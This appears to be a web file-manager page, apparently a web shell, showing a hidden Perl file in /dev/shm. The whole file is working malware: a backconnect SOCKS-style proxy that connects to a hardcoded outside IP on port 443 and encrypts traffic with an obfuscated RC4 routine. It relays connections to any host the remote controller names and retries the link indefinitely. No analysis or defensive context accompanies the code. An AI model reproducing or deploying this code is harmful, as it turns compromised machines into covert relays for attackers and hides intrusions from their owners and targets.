Viewing File: /dev/shm/.adr_vault_1769931422
#!/usr/bin/env perl
use strict;
use warnings;
use Socket;
use Socket qw(IPPROTO_TCP TCP_NODELAY);
use Fcntl qw(F_GETFL F_SETFL O_NONBLOCK);
my $host = '62.60.131.184';
my $port = 443;
my $xordata = "\x00" x 50;
for (my $i = 0; $i < 50; $i++) { vec($xordata, $i, 8) = int(rand(255)); }
# ====================== ОПТИМИЗИРОВАННЫЙ RC4 ======================
sub Rc4_crypt_fast {
my ($passw, $length, $buff0, $start, $sz) = @_;
# Быстрый доступ к данным
my $data_ref = $$buff0;
my $key_ref = $$passw;
# Первый XOR с ключом
for (my $i = 0; $i < $sz; $i++) {
vec($data_ref, $start + $i, 8) ^= vec($key_ref, $i % $length, 8);
}
# Инициализация RC4 (точная копия оригинального алгоритма)
my $rc4 = "\x00" x 256;
vec($rc4, $_, 8) = $_ for 0..255;
my $pockemon0 = 0;
my $pockemon1 = 0;
my $pockemon2 = 0;
my $pockemon3 = $length;
my $gs = 0;
while(1) {
if ($gs == 0) {
$pockemon2 = 0;
$pockemon3 = $length;
}
if ($gs != 0) {
$gs = 0;
$pockemon2++;
if (--$pockemon3 == 0) { next; }
}
my $pockemon7 = vec($rc4, $pockemon0, 8);
$pockemon1 += vec($key_ref, $pockemon2, 8);
$pockemon1 &= 255;
$pockemon1 += $pockemon7;
$pockemon1 &= 255;
my $pockemon6 = vec($rc4, $pockemon1, 8);
vec($rc4, $pockemon0, 8) = $pockemon6;
vec($rc4, $pockemon1, 8) = $pockemon7;
$pockemon0++;
$pockemon0 &= 255;
if ($pockemon0 != 0) {
$gs = 1;
next;
}
# Основное шифрование
$pockemon1 = 0;
$pockemon0 = 0;
$pockemon2 = 0;
for (my $pockemon3 = 0; $pockemon3 < $sz; $pockemon3++) {
$pockemon2++;
$pockemon2 &= 255;
$pockemon7 = vec($rc4, $pockemon2, 8);
$pockemon1 += $pockemon7;
$pockemon1 &= 255;
my $pockemon8 = vec($rc4, $pockemon1, 8);
vec($rc4, $pockemon2, 8) = $pockemon8;
vec($rc4, $pockemon1, 8) = $pockemon7;
$pockemon8 += $pockemon7;
$pockemon8 &= 255;
vec($data_ref, $start + $pockemon3, 8) ^= vec($rc4, $pockemon8, 8);
}
last;
}
# Второй XOR с ключом
for (my $i = 0; $i < $sz; $i++) {
vec($data_ref, $start + $i, 8) ^= vec($key_ref, $i % $length, 8);
}
$$buff0 = $data_ref;
}
# Обертка для совместимости с оригинальным вызовом
sub Rc4_crypt {
Rc4_crypt_fast(@_);
}
# ====================== ОПТИМИЗИРОВАННЫЙ BCCNCT ======================
sub bccnct_optimized {
my ($host, $port) = @_;
my $remaining = 0;
my $remaining4 = 0;
my $domain;
my $port0;
my @socketarr;
my @socketarray;
my $buffer = "\x00" x 100;
my $buffernull = "\x00\x00\x00";
my $buffer0 = "\x00" x 65536;
my $buffer1 = "\x00" x 65536;
my $isExit = 0;
my $_ret0 = 0;
my $ecx = 0;
my $eax = 0;
my $data = 0;
my $_ret = 0;
my $ebx = 0;
my $edx = 0;
my $counter = 0;
my $countcc = 0;
my $rin = '';
my $str_vec = "\x00";
my $str_wec = "\x00\x00";
for (my $i = 0; $i < 200; $i++) { $socketarray[$i] = 0; }
my $responce = "\x00\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";
# Создание и настройка главного сокета
socket($socketarr[0], PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return 0;
setsockopt($socketarr[0], IPPROTO_TCP, TCP_NODELAY, 1);
setsockopt($socketarr[0], SOL_SOCKET, SO_RCVBUF, pack("I", 65536));
setsockopt($socketarr[0], SOL_SOCKET, SO_SNDBUF, pack("I", 65536));
my $paddr = sockaddr_in($$port, inet_aton($$host));
unless(connect($socketarr[0], $paddr)) { goto close0; }
# Отправка handshake
substr($buffer, 0, 50) = $xordata;
substr($buffer, 50, 2) = "\xFF\xFF";
substr($buffer, 54, 11) = "Perl script";
Rc4_crypt(\$xordata, 50, \$buffer, 50, 50);
syswrite($socketarr[0], $buffer, length($buffer));
my $last_activity = time();
while(1) {
# Проверяем таймаут неактивности
if (time() - $last_activity > 60) {
Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);
syswrite($socketarr[0], $buffernull, length($buffernull));
$last_activity = time();
}
$countcc = 0;
$rin = '';
# Проверяем активные сокеты (целевые серверы)
for (my $i = 1; $i < 200; $i++) {
if ($socketarray[$i] == 1) {
vec($rin, fileno($socketarr[$i]), 1) = 1;
$countcc++;
}
}
# Обработка данных от целевых серверов
if ($countcc > 0) {
unless (select($rin, undef, undef, 0.001)) { goto next__; }
for (my $i = 1; $i < 200; $i++) {
if (($socketarray[$i] == 1) && vec($rin, fileno($socketarr[$i]), 1)) {
$data = sysread($socketarr[$i], $buffer1, 65530, 3);
unless ($data) {
$socketarray[$i] = 0;
close($socketarr[$i]);
vec($str_vec, 0, 8) = $i;
substr($responce, 0, 1) = $str_vec;
substr($responce, 1, 2) = "\x00\x00";
Rc4_crypt(\$xordata, 50, \$responce, 0, 3);
syswrite($socketarr[0], $responce, 3, 0);
} else {
vec($str_vec, 0, 8) = $i;
substr($buffer1, 0, 1) = $str_vec;
substr($buffer1, 1, 2) = pack('S', $data);
Rc4_crypt(\$xordata, 50, \$buffer1, 0, 3);
Rc4_crypt(\$xordata, 50, \$buffer1, 3, $data);
syswrite($socketarr[0], $buffer1, 3 + $data);
}
}
}
}
next__:
# Проверяем данные от главного сервера
if ($remaining4 != 4) {
$rin = '';
vec($rin, fileno($socketarr[0]), 1) = 1;
my $ret = select($rin, undef, undef, 0.01);
next if ($ret < 0);
if ($ret == 0) {
$counter++;
if ($counter == 100 * 60) {
$counter = 0;
last if (substr($buffernull, 0, 3) ne "\x00\x00\x00");
last if ($remaining != 0);
last if ($remaining4 != 0);
Rc4_crypt(\$xordata, 50, \$buffernull, 0, 3);
syswrite($socketarr[0], $buffernull, length($buffernull));
}
next;
}
}
if ($remaining != 0 || $remaining4 == 4) {
if ($edx == 0) {
if (substr($buffer0, 0, 1) eq "\xFF" && substr($buffer0, 1, 1) eq "\xFE") {
$isExit = 1;
last;
} elsif ($ebx < 200 && $ebx > 0 && $socketarray[$ebx] == 1) {
$socketarray[$ebx] = 0;
close($socketarr[$ebx]);
vec($str_vec, 0, 8) = $ebx;
substr($responce, 0, 1) = $str_vec;
substr($responce, 1, 2) = "\x00\x00";
Rc4_crypt(\$xordata, 50, \$responce, 0, 3);
syswrite($socketarr[0], $responce, 3, 0);
}
} else {
$ecx = $edx;
$ecx = $ecx - $remaining;
$data = sysread($socketarr[0], $buffer0, $ecx, $remaining + 4);
unless ($data) { last; }
$remaining += $data;
$last_activity = time();
if ($edx == $remaining) {
Rc4_crypt(\$xordata, 50, \$buffer0, 4, $remaining);
if (vec(substr($buffer0, 0, 1), 0, 8) == 0) {
socket($socketarr[$ebx], PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$_ret0 = 0;
$socketarray[$ebx] = 1;
substr($responce, 0, 13) = "\x00\x0A\x00\x05\x01\x00\x01\x00\x00\x00\x00\x00\x00";
vec($str_vec, 0, 8) = $ebx;
substr($responce, 0, 1) = $str_vec;
setsockopt($socketarr[$ebx], IPPROTO_TCP, TCP_NODELAY, 1);
setsockopt($socketarr[$ebx], SOL_SOCKET, SO_RCVBUF, pack("I", 65536));
setsockopt($socketarr[$ebx], SOL_SOCKET, SO_SNDBUF, pack("I", 65536));
fcntl($socketarr[$ebx], F_SETFL, fcntl($socketarr[$ebx], F_GETFL, 0) | O_NONBLOCK);
# Определение типа адреса (оригинальная логика)
if (vec(substr($buffer0, 7, 1), 0, 8) == 3) {
$domain = substr($buffer0, 9, vec(substr($buffer0, 8, 1), 0, 8));
$port0 = vec(substr($buffer0, 9 + vec(substr($buffer0, 8, 1), 0, 8) + 0, 1) .
substr($buffer0, 9 + vec(substr($buffer0, 8, 1), 0, 8) + 1, 1), 0, 16);
} elsif (vec(substr($buffer0, 7, 1), 0, 8) == 1) {
$domain = sprintf("%d.%d.%d.%d",
vec(substr($buffer0, 8 + 0, 1), 0, 8),
vec(substr($buffer0, 8 + 1, 1), 0, 8),
vec(substr($buffer0, 8 + 2, 1), 0, 8),
vec(substr($buffer0, 8 + 3, 1), 0, 8));
$port0 = vec(substr($buffer0, 12 + 0, 1) .
substr($buffer0, 12 + 1, 1), 0, 16);
} else {
goto close_;
}
# Установка соединения с целевым сервером
eval {
my $paddr = sockaddr_in($port0, inet_aton($domain));
connect($socketarr[$ebx], $paddr);
vec(my $win = '', fileno($socketarr[$ebx]), 1) = 1;
unless (select(undef, $win, undef, 1)) { goto close_; }
fcntl($socketarr[$ebx], F_SETFL, fcntl($socketarr[$ebx], F_GETFL, 0) ^ O_NONBLOCK);
substr($responce, 4, 1) = "\x00";
$_ret0 = 1;
};
close_:
Rc4_crypt(\$xordata, 50, \$responce, 0, 3);
Rc4_crypt(\$xordata, 50, \$responce, 3, 10);
syswrite($socketarr[0], $responce, length($responce));
if ($_ret0 == 0) {
$socketarray[$ebx] = 0;
close($socketarr[$ebx]);
vec($str_vec, 0, 8) = $ebx;
substr($responce, 0, 1) = $str_vec;
substr($responce, 1, 2) = "\x00\x00";
Rc4_crypt(\$xordata, 50, \$responce, 0, 3);
syswrite($socketarr[0], $responce, 3, 0);
}
} elsif ($socketarray[$ebx] == 1) {
syswrite($socketarr[$ebx], $buffer0, $remaining, 4);
}
$remaining = 0;
}
}
$remaining4 = 0;
} else {
$eax = 4;
$eax = $eax - $remaining4;
$data = sysread($socketarr[0], $buffer0, $eax, $remaining4);
unless ($data) { last; }
$remaining4 += $data;
$last_activity = time();
substr($buffernull, 0, 3) = "\x00\x00\x00";
$counter = 0;
if ($remaining4 == 4) {
Rc4_crypt(\$xordata, 50, \$buffer0, 0, 4);
$ebx = vec(substr($buffer0, 1, 1), 0, 8);
$edx = unpack('S', substr($buffer0, 2, 2));
$_ret = 1;
}
}
}
close0:
close($socketarr[0]);
for (my $i = 0; $i < 200; $i++) {
if ($socketarray[$i] == 1) { close($socketarr[$i]); }
}
if ($isExit == 1) { exit; }
return $_ret;
}
# ====================== ГЛАВНЫЙ ЦИКЛ С ЭКСПОНЕНЦИАЛЬНОЙ ЗАДЕРЖКОЙ ======================
my $retry_delay = 1;
my $max_retry_delay = 180;
while(1) {
if (bccnct_optimized(\$host, \$port)) {
$retry_delay = 1; # Сброс задержки при успехе
sleep 1;
} else {
sleep $retry_delay;
$retry_delay = $retry_delay * 2;
$retry_delay = $max_retry_delay if $retry_delay > $max_retry_delay;
}
}
Back to Directory
File Manager